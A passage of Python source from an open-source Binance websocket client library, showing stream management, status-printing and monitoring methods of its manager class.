self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logging.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
Has a specific stream a stop_request?
:param stream_id: id of a stream
:type stream_id: uuid
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
Has a specific stream a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_update_availabe(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
self.stream_list[stream_id]['kill_request'] = True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False, mode="FIFO"):
"""
Get oldest or latest entry from
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from FIFO/LIFO stack.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:param mode: How to read from the `stream_buffer` - "FIFO" (default) or "LIFO".
:type mode: str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
if mode.upper() == "FIFO":
stream_data = self.stream_buffer.popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffer.pop()
else:
return False
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
if mode.upper() == "FIFO":
stream_data = self.stream_buffers[stream_buffer_name].popleft()
elif mode.upper() == "LIFO":
stream_data = self.stream_buffers[stream_buffer_name].pop()
else:
return False
return stream_data
except IndexError:
return False
except KeyError:
return False
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack/pipe (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.popleft()
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string=""):
"""
Print all infos about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: uuid
:param add_string: text to add to the output
:type add_string: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
"===============================================================================================\r\n")
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
:param disable_print: set to `True` to use curses instead of print()
:type disable_print: bool
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
try:
print_text = (
str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
"===============================================================================================\r\n"
)
if disable_print:
if sys.platform.startswith('Windows'):
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
:param hight_per_row: set the hight per row for the image hight calculation
:type hight_per_row: int
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ansi excape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
If you want to start a stream with a new config, its recommended, to first start a new stream with the new
settings and close the old stream not before the new stream received its first data. So your data will stay
consistent.
:param stream_id: id of the old stream
:type stream_id: uuid
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:return: new stream_id
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
"""
# starting a new socket and stop the old stream not before the new stream received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
def run(self):
"""
This method overloads `threading.run()` and starts management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks)
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams)
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
Is going to be the default user_address, once the websocket is created with this default value, its not possible
to change it. If you plan to use different user_address its recommended to not use this method! Just provide the
user_address with create_stream() in the market parameter.
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logging.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: uuid
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
Set how much received_last_second entries are stored till they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: uuid
"""
self.restart_requests[stream_id] = {'status': "new"}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
Sending more than 8000 chars via websocket.send() leads to a connection loss, 350 list elements is a good limit
to keep the payload length under 8000 chars and avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
:param max_items_per_request: max size for params, if more it gets splitted
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items > max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread, args=(host, port, warn_on_update))
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logging.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
# send signal to all threads
self.stop_manager_request = True
# delete listenKeys
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logging.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream can not heal itself in cause of wrong parameter (wrong market, channel type) it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logging.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report with this call their shutdowns
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
